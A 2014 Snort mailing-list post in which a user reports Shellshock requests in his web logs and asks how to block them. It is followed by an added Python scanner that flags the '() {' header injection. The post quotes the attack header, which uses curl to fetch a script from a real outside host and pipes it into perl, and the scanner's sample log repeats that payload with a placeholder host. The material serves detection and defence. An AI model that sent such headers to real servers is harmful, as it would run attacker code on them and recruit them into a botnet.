Snort mailing list archives

Odd http requests in the logs


From: Richard Geddes <richardcgeddes () gmail com>
Date: Sun, 02 Nov 2014 23:23:51 -0500

Hello,

I received a few (9) events in my web logs with the following fields:

agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

I downloaded index.png, and it turns out to be a base64-encoded Perl
script that has comments about a botnet. It seems to target Apache.

I'm using Snort with the Snort VRT rules on a pfSense firewall, and pfSense,
Snort, and the Snort rules are up to date.

Snort seems to be passing these requests on to my web server, and it
seems to me they should be blocked.

I don't know enough about how web servers and log handlers process this
data to determine if it's a threat.

Is there a way to tell Snort to block HTTP requests with these fields?
The source of the malicious file should probably be regex'd in case
there are alternate sources of this file.

Thanks,
Richard
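As an added example that is not part of Richard's post: a Python scanner that flags the `() {` header prefix he quotes when it appears in Apache combined-format log lines. The log layout, field names, hosts and sample entries are constructed assumptions; the match keys on the bash function-definition opener rather than the payload URL, so alternate download sources are caught as well.

```python
import re
from typing import Dict, List, Optional

# Assumed Apache "combined" layout: host ident user [time] "request" status
# bytes "referrer" "user-agent". Header values are captured without quotes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"\s*$'
)

# "() { :; };" is a bash function definition planted in a header value (the
# Shellshock trigger). Matching the "() {" opener, whitespace-tolerant, flags
# the injection no matter which URL follows it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(entry: Dict[str, str]) -> List[str]:
    """Return the names of the fields carrying a Shellshock-style trigger."""
    return [f for f in ("agent", "referrer", "request")
            if SHELLSHOCK_RE.search(entry[f])]

def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Report line number, source host and offending fields for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        entry = parse_combined(line.rstrip("\n"))
        if entry is None:
            continue  # unparsable line; a production scanner should count these
        fields = find_shellshock(entry)
        if fields:
            hits.append({"line": n, "host": entry["host"], "fields": fields})
    return hits

# Constructed sample entries modelled on the fields quoted in the post; hosts
# and the payload URL are documentation-range placeholders, not real IoCs.
PAYLOAD = '() { :; }; curl http://203.0.113.9/~x/index.png | perl'
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Nov/2014:22:10:03 -0500] "GET / HTTP/1.1" 200 612 '
    '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [02/Nov/2014:22:11:17 -0500] "GET /cgi-bin/status HTTP/1.1" '
    f'200 612 "{PAYLOAD}" "{PAYLOAD}"',
    '203.0.113.9 - - [02/Nov/2014:22:11:18 -0500] "GET / HTTP/1.1" 200 612 '
    '"-" "(){ :;}; echo probe"',  # spacing variant, still a function opener
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['host']} injected via {hit['fields']}")
```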

Snort-users mailing list